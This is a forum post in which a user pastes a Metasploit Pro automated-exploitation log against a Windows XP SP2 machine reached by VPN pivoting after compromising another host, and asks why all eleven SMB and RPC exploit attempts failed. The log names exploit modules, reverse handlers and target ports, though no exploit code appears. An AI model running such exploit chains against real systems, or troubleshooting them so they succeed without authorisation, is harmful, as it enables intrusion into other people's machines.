adelhasoon

Exploit succeed on LAN but failed on WAN?

Discussion created by adelhasoon on Dec 3, 2011
Latest reply on Jan 30, 2012 by makmzl02

Hello all,

 

I have succeeded to exploit winxp sp2 in my lan, but failed to exploit the samw machine through lan using VPN pivoting and nexpose scan,

first i exploited a machine through payload in remote netowrk, then nexpose scan and found 12 vulnerabilities in that winxp sp2 machine but failed to exploit it and these are the result of exploit operation though meta pro :

 

 

[*] [2011.12.03-11:18:57] Minimum rank: good, transport evasion level: 0, application evasion level: 0

[*] [2011.12.03-11:18:57] Target hosts: 192.168.2.2

[+] [2011.12.03-11:18:57] Workspace:dlink Progress:1/100 (1%) Starting analysis

[+] [2011.12.03-11:18:57] Workspace:dlink Progress:2/100 (2%) Analyzing exploits: filtering by OS, vulnerability, port

[+] [2011.12.03-11:20:26] Workspace:dlink Progress:3/100 (3%) Building exploit map: matching by OS, vulnerability, port

[*] [2011.12.03-11:20:26] Matching exploits: 0 hosts processed (0 potential actions)

[+] [2011.12.03-11:20:26] Workspace:dlink Progress:4/100 (4%) Building attack plan

[*] [2011.12.03-11:20:26] Finalizing attack plan: 11 total exploits

[+] [2011.12.03-11:20:27] Workspace:dlink Progress:5/16 (31%) [1/11] 192.168.2.2:445 - Microsoft Print Spooler Service Impersonation Vulnerability

[*] [2011.12.03-11:20:30] [0001] Started reverse handler on 0.0.0.0:1024

[*] [2011.12.03-11:20:53] [0001] Trying target Windows Universal...

[*] [2011.12.03-11:20:53] [0001] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.2.2[\spoolss] ...

[*] [2011.12.03-11:21:00] [0001] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.2.2[\spoolss] ...

[-] [2011.12.03-11:21:02] [0001] Exploit exception: The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)

[+] [2011.12.03-11:21:05] Workspace:dlink Progress:6/16 (37%) [2/11] 192.168.2.2:445 - Microsoft Server Service Relative Path Stack Corruption

[*] [2011.12.03-11:21:07] [0002] Started reverse handler on 0.0.0.0:1031

[*] [2011.12.03-11:21:19] [0002] Automatically detecting the target...

[*] [2011.12.03-11:23:06] [0002] Fingerprint: Windows XP - Service Pack 2 - lang:Unknown

[*] [2011.12.03-11:23:06] [0002] We could not detect the language pack, defaulting to English

[*] [2011.12.03-11:23:06] [0002] Selected Target: Windows XP SP2 English (AlwaysOn NX)

[-] [2011.12.03-11:23:17] [0002] Exploit exception: execution expired

[+] [2011.12.03-11:23:20] Workspace:dlink Progress:7/16 (43%) [3/11] 192.168.2.2:445 - Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow

[*] [2011.12.03-11:23:20] [0003] Started reverse handler on 0.0.0.0:1032

[*] [2011.12.03-11:23:20] [0003] Connecting to the server...

[-] [2011.12.03-11:23:33] [0003] Exploit exception: The connection timed out (192.168.2.2:445).

[+] [2011.12.03-11:23:36] Workspace:dlink Progress:8/16 (50%) [4/11] 192.168.2.2:445 - Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow

[*] [2011.12.03-11:23:36] [0004] Started reverse handler on 0.0.0.0:1034

[-] [2011.12.03-11:23:55] [0004] Exploit exception: Login Failed: execution expired

[+] [2011.12.03-11:23:57] Workspace:dlink Progress:9/16 (56%) [5/11] 192.168.2.2:445 - Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow

[*] [2011.12.03-11:23:58] [0005] Started reverse handler on 0.0.0.0:1036

[-] [2011.12.03-11:24:18] [0005] Exploit exception: The connection timed out (192.168.2.2:445).

[+] [2011.12.03-11:24:21] Workspace:dlink Progress:10/16 (62%) [6/11] 192.168.2.2:445 - Microsoft Workstation Service NetAddAlternateComputerName Overflow

[*] [2011.12.03-11:24:22] [0006] Started reverse handler on 0.0.0.0:1038

[*] [2011.12.03-11:24:51] [0006] Binding to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.2.2[\BROWSER] ...

[-] [2011.12.03-11:25:06] [0006] Exploit exception: execution expired

[+] [2011.12.03-11:25:08] Workspace:dlink Progress:11/16 (68%) [7/11] 192.168.2.2:445 - Microsoft NetDDE Service Overflow

[*] [2011.12.03-11:25:09] [0007] Started reverse handler on 0.0.0.0:1039

[-] [2011.12.03-11:25:28] [0007] Exploit exception: The connection timed out (192.168.2.2:445).

[+] [2011.12.03-11:25:30] Workspace:dlink Progress:12/16 (75%) [8/11] 192.168.2.2:445 - Microsoft Plug and Play Service Overflow

[*] [2011.12.03-11:25:31] [0008] Started reverse handler on 0.0.0.0:1040

[*] [2011.12.03-11:25:31] [0008] Connecting to the SMB service...

[-] [2011.12.03-11:25:48] [0008] Error: Rex::ConnectionTimeout The connection timed out (192.168.2.2:445).

[*] [2011.12.03-11:25:48] [0008] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.2.2[\browser] ...

[-] [2011.12.03-11:26:03] [0008] Exploit exception: The connection timed out (192.168.2.2:445).

[+] [2011.12.03-11:26:06] Workspace:dlink Progress:13/16 (81%) [9/11] 192.168.2.2:445 - Microsoft Server Service NetpwPathCanonicalize Overflow

[*] [2011.12.03-11:26:07] [0009] Started reverse handler on 0.0.0.0:1041

[*] [2011.12.03-11:27:08] [0009] Windows XP SP2 is not exploitable

[+] [2011.12.03-11:27:11] Workspace:dlink Progress:14/16 (87%) [10/11] 192.168.2.2:445 - Microsoft Services MS06-066 nwapi32.dll

[*] [2011.12.03-11:27:12] [0010] Started reverse handler on 0.0.0.0:1042

[*] [2011.12.03-11:27:12] [0010] Connecting to the SMB service...

[-] [2011.12.03-11:27:30] [0010] Exploit exception: Login Failed: execution expired

[+] [2011.12.03-11:28:03] Workspace:dlink Progress:15/16 (93%) [11/11] 192.168.2.2:445 - Microsoft Services MS06-066 nwwks.dll

[*] [2011.12.03-11:28:04] [0011] Started reverse handler on 0.0.0.0:1043

[*] [2011.12.03-11:28:04] [0011] Connecting to the SMB service...

[*] [2011.12.03-11:28:57] [0011] Binding to e67ab081-9844-3521-9d32-834f038001c0:1.0@ncacn_np:192.168.2.2[\nwwks] ...

[-] [2011.12.03-11:29:08] [0011] Exploit exception: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)

[+] [2011.12.03-11:29:10] Workspace:dlink Progress:16/16 (100%) Complete (0 sessions opened, 1 host targeted, 1 host skipped)

 

 

I need to know the reason and if there are some parameters and settings i should configure ?

 

thank you

Outcomes